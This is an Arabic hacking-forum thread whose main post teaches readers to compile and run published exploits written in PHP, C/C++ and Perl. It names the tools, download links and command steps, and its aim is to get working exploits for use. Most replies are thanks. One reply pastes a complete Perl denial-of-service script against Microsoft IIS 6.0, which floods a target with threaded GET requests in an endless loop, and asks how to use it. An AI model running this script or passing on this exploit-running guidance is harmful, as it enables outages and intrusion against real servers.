بسم الله الرحمن الرحيم
كيفكم ياوحوش برامج
اليوم

هنتعلم اليوم كيف نستغل كل أنواع الثغرات (مهما كانت اللغة اللى مكتوبة بها)
يعنى هنعرف نترجم ونطلع الاستغلال الخاص بالثغرات المكتوبة

PHP
C/C++
PERL
=======
اولا :أحب أن أشكر الاخ c_m على شرحه للسى والبيرل وأرجو ان نرى المزيد
لكن انا كتبت الموضوع ليكون كامل والكمال لله وحده + توضيح بعض النقط الهامه مثل ثغرات السى الخاصة
باللينكس والخاصة بالويندوز + شرح الثغرات المتكتوبة ب php

يلا نبدأ فى الموضوع ونبدأ بثغرات الphp وعلى حسب أعتقادى لا يوجد له شرح وهى ترجمة واستخراج ثغرات المكتوبة بلغة الPHP

اولا:
سنحتاج الى برنامج لعمل الكومبايل ويسمى BAMCOMPILE

للتحميل:


http://www.bambalam.se/bamcompile/download/bamcompile1.21.zip



بعد التحميل
1- فك ضغط الملف
2- خذ ملف البرنامج وحط فى بارتشن السى
===
3- نحضر اى ثغرة مكتوبة بالPHP ثم ننسخ الكود ونلصقة فى النوب باد ثم انحفظ الملف بامتداد PHP مثلا
EXPLOIT.PHP
ثم نضع ملف الثغرة فى مجلد برنامجنا وهيكون C:\bamcomplie


مع ملاحظة انه عند حفظ الملف
SAVE AS TYPE------>ALLFILES

مثال لثغرة PHP
http://www.milw0rm.com/exploits/3971 (http://www.milw0rm.com/exploits/3971)

ثم نشغل الدوس من قائمة ابدأ ثم نختار RUN ثم كتب CMD

بعدين نكتب
:C
انتر
ثم
CD BAMCOMPILE
انتر
ثم
bamcompile.exe exploit.php

مع ملاحظة ان EXPLOIT على حسب اسم ملف الثغرة اللى سميتها بيه

بعد ان فعلنا ذلك سوف ينتج لنا برنامج فى نفس فولدر البرنامج اسمه EXPLOIT.EXE
ثم من الدوس نشغله وهيطلع لنا الاستغلال
نشوف الصور

http://www.up.00op.com/data/visitors/2007/05/26/storm_1356905320_468331508.png

http://www.up.00op.com/data/visitors/2007/05/26/storm_1856732762_1952464770.png

مبروك عليك الاستغلال

ملحوظه: توجد طريقة أخرى لاستخراج الاستغلال وذلك بعمل اى منتدى مجانى ثم نرفع ملف الثغرة ونشغله مثل اى صفحة php عادية
================================================== =

ثانيا : الثغرات المكتوبة بالسى والسى++
اولا : لازم ننتبه لنقطه هامه وهى انه فى ثغرات مكتوبة بالسى تكون خاصة بالويندوز واخرى تكون خاصة باللينكس

ولكن كيف نميز بينهم
أقولك

الثغرة اللى تعمل على الويندوز تكون بدايتها هكذا
#include <wchar.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>

اما اللينكس
#include <netinet/in.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <sys/types.h>

الحين لترجمة الثغرات الويندوزسنحتاج برنامج DEV COMPILER
لتحميله




http://kent.dl.sourceforge.net/sourceforge/dev-cpp/devcpp-4.9.9.2_nomingw_setup.exe



ثم بعد تسطيب البرنامج
اولا نحضر اى ثغرة ملكتوبة بلغة السى او السى ++ ونحفظها بامتداد C مثلا EXPLOIT.C
وبعدين
نفتحها بالبرنامج او نضغط عليها مرتين وستفتح معانا
ونشوف الصورة
لعمل الكومبايل
http://www.up.00op.com/data/visitors/2007/05/26/storm_750010593_1046584280.png

وبعد ما سوينا الكومبايل هيطلع لنا برنامج EXPLOIT.EXE
نشغله بالدوس مثل السابق بالضبط وهيطلع لينا الاستغلال
=========

ثانيا: برنامج CYGEN يستخدم لترجمة ثغرات اللينكس كما ذكرت من قبل

حمله من موقعه:

كود PHP:

http://cygwin.com



او اى موقع

ثم تابع الصور
http://www.up.00op.com/data/visitors/2007/05/26/storm_2056977672_1042051604.png

http://www.up.00op.com/data/visitors/2007/05/26/storm_1241091749_107712428.png

http://www.up.00op.com/data/visitors/2007/05/26/storm_1766261913_1275339585.png

هنا سنختار الحزمة التى سنعمل بها فقط وهى طبعا الخاصة بالسى والسى++

http://www.up.00op.com/data/visitors/2007/05/26/storm_100570881_557481279.png

بعدين سيبدا البرنامج بتحميل الباكيج من موقعه والموضوع يستغرق وقت شبه طويل

المهم بعد الانتهاء
بعد من ملف الثغرة نفتح البرنامج ونسوى امر الكومبايل
gcc exploit.c -o exploit.exe

وهيطلع لنا برده برنامجEXPLOIT.EXE نفس الشى
وطبعا الباقة كله عارفه شغله من الدوس
================================================== ===========

نيجى لثغرات البيرل:
حمل برنامج ACTIVE PERL اخر اصدار من هنا



http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.8.820-MSWin32-x86-274739.msi



ثم بعد تحميل وتسطيب البرنامج
نحضر اى ثغرة بيرل ونحفظها بامتداد PL مثلا EXPLOIT.PL ثم نضعه فى فولدرC:\Perl\bin يعنى فى فولدر BIN
مثال ثغرة بيرل
http://www.milw0rm.com/exploits/3780 (http://www.milw0rm.com/exploits/3780)
ثم نشغل الدوس
:d
ملحوظه : d على حسب مسار مجلد البرنامج
انتر
CD PERL
انتر
CD BIN
انتر
ثم
PERL EXPLOIT.PL

وهيطلع لنا الاستغلال
http://www.up.00op.com/data/visitors/2007/05/26/storm_1504390996_1168929520.png


انتهى الموضوع

تحت التجربة وشكرا جزيلا

مشكورررررررررررررررررررررررررررررررررررررررررررررر ررررر

مشكووووووووووووور

بارك الله فيك اخي الغالي على الشرح الاكثر من رائع

مشكووووووووووووووووووووووووووووووووووووور

مشكوور

okkkkkkkkkkkkk

شكررررررررررررررررررررا

مشكور

شكرا اخي على الشرح

مشكورررررررر

مشكور

مشكوور وتم اظافته للبرنامج

الأستاذ أستاذ سيبك انت

ِكرااااااااااااااااااااااااااااااااااااااااااااااا

ليه الصور ما تطلع

مشكورين أنا بس عندي سؤال للمحترفين
يا ريت حده يجاوبني ؟؟؟؟؟؟؟:confused:
كيفية استغلال هل ثغره أو أذا في معلومات عنها أو بكون شاكر ألكم:confused:
على العموم مشكورين على الموضوع الرائع:biggrin:
الثغره بي موقع الميلورم

Microsoft IIS 6.0 Service Exploit

#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope kingcope@gmx.net
################################################## ########################
###*********************************************** ************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
################################################## ########################

use IO::Socket;
use threads;

if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];

$|=1;

sub sendit {
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');

print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
}

$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');

print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";

$k=0;
while (<$sock>) {
if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
$k=1;
last;
}
}

if ($k==0) {
print "Server does not seem vulnerable to this attack.\n";
exit;
}

print "ATTACK!\n";

while(1){

for (my $i=0;$i<=100;$i++) {
$thr = threads->new(\&sendit);
print "\r\r\r$i/100 ";
}

foreach $thr (threads->list) {
$thr->join;
}
}

# milw0rm.com [2007-05-21]

مشكور ياعسل هذا ليفيدني في شئ لاني مشارك من علي الجوال

مشكور عزيزي

مشكوور اخي

مشكوووووووووووووووووووووووووووووووووووووووووور

مشكووووووووووووووووووووووووووووور

مشكووووووووووووووور

mrc bcp

hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhh

tanks my brother about programs

تحت التجربة وشكرا جزيلا

شرح وافي جداااااااااااااااااااااااااا

مشكوررررررررررررررر اخي على المجهود الحلوووووووووووووو

thanksssssssssss

مشكورررررررررررررررررررررررررر

شكرااااااااااااااا

مشكووور جدا

مشكوووووووووووووووووووووووووووووووووووووووور

مشــكور ..

mashkooooooooooooooooooooooooooooooooooooor

maskkooooooooooooooor

مشكوور

مممممممممممممممممممممممممممممممممممم

شكرا على الموضوع

الله يجزيكم الخيـر علـى تعليمكـم الناس وتبصيرهم بالعلوم المختلفه.

xxxxxxxxxxxxxxxxxxx

http://www.arabsys.net/pic/thanx/24.gif

شكرررررررررررا

شكررررررررررررا